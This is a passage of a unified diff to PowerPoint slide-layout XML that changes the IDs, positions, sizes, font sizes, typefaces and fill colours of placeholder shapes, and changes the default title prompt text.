+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="73" name="PlaceHolder 5"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2015,8 +1887,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="4098240"/>
-            <a:ext cx="3385800" cy="2075040"/>
+            <a:off x="609480" y="3682080"/>
+            <a:ext cx="3533040" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2027,18 +1899,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="80" name="PlaceHolder 6"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="74" name="PlaceHolder 6"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2048,8 +1917,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="4393440" y="4098240"/>
-            <a:ext cx="3385800" cy="2075040"/>
+            <a:off x="4319640" y="3682080"/>
+            <a:ext cx="3533040" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2060,18 +1929,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="81" name="PlaceHolder 7"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="75" name="PlaceHolder 7"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2081,8 +1947,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="7949160" y="4098240"/>
-            <a:ext cx="3385800" cy="2075040"/>
+            <a:off x="8029800" y="3682080"/>
+            <a:ext cx="3533040" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2093,11 +1959,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -2126,7 +1989,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="7" name="PlaceHolder 1"/>
+          <p:cNvPr id="4" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2136,8 +1999,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2146,18 +2009,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2167,8 +2028,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="10515240" cy="4350960"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="10972440" cy="3977280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2179,11 +2040,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -2212,7 +2070,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="9" name="PlaceHolder 1"/>
+          <p:cNvPr id="6" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2222,8 +2080,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2232,18 +2090,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="10" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2253,8 +2109,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="5131080" cy="4350960"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="5354280" cy="3977280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2265,18 +2121,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="11" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2286,8 +2139,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="1825560"/>
-            <a:ext cx="5131080" cy="4350960"/>
+            <a:off x="6231960" y="1604520"/>
+            <a:ext cx="5354280" cy="3977280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2298,11 +2151,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -2331,7 +2181,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="12" name="PlaceHolder 1"/>
+          <p:cNvPr id="9" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2341,8 +2191,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2351,11 +2201,9 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -2384,7 +2232,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="13" name="PlaceHolder 1"/>
+          <p:cNvPr id="10" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2394,8 +2242,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="6144120"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="5307840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2435,7 +2283,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="14" name="PlaceHolder 1"/>
+          <p:cNvPr id="11" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2445,8 +2293,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2455,18 +2303,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="15" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="12" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2476,8 +2322,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2488,18 +2334,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="16" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2509,8 +2352,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="1825560"/>
-            <a:ext cx="5131080" cy="4350960"/>
+            <a:off x="6231960" y="1604520"/>
+            <a:ext cx="5354280" cy="3977280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2521,18 +2364,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="17" name="PlaceHolder 4"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="14" name="PlaceHolder 4"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2542,8 +2382,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="4098240"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="609480" y="3682080"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2554,11 +2394,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -2587,7 +2424,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="18" name="PlaceHolder 1"/>
+          <p:cNvPr id="15" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2597,8 +2434,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2607,18 +2444,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="19" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="16" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2628,8 +2463,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="5131080" cy="4350960"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="5354280" cy="3977280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2640,18 +2475,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="20" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="17" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2661,8 +2493,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="1825560"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="6231960" y="1604520"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2673,18 +2505,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="21" name="PlaceHolder 4"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="18" name="PlaceHolder 4"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2694,8 +2523,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="4098240"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="6231960" y="3682080"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2706,11 +2535,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -2739,7 +2565,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="22" name="PlaceHolder 1"/>
+          <p:cNvPr id="19" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2749,8 +2575,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2759,18 +2585,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="23" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="20" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2780,8 +2604,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2792,18 +2616,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="24" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="21" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2813,8 +2634,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="1825560"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="6231960" y="1604520"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2825,18 +2646,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="25" name="PlaceHolder 4"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="22" name="PlaceHolder 4"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -2846,8 +2664,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="4098240"/>
-            <a:ext cx="10515240" cy="2075040"/>
+            <a:off x="609480" y="3682080"/>
+            <a:ext cx="10972440" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -2858,11 +2676,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -2908,62 +2723,24 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1523880" y="1122480"/>
-            <a:ext cx="9143640" cy="2387160"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr anchor="b"/>
-          <a:p>
-            <a:pPr algn="ctr">
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="6000" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri Light"/>
-              </a:rPr>
-              <a:t>Click to </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="6000" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri Light"/>
-              </a:rPr>
-              <a:t>edit </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="6000" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri Light"/>
-              </a:rPr>
-              <a:t>Master </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="6000" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="ffffff"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri Light"/>
-              </a:rPr>
-              <a:t>title style</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="6000" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:off x="838080" y="365040"/>
+            <a:ext cx="10514880" cy="1324800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:latin typeface="Arial"/>
+              </a:rPr>
+              <a:t>Click to edit the title text format</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -2971,118 +2748,6 @@
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="1" name="PlaceHolder 2"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="dt"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="838080" y="6356520"/>
-            <a:ext cx="2742840" cy="364680"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr anchor="ctr"/>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:fld id="{A0C4BD48-9BEC-484F-93F1-61EBDC87F51F}" type="datetime">
-              <a:rPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
-                <a:solidFill>
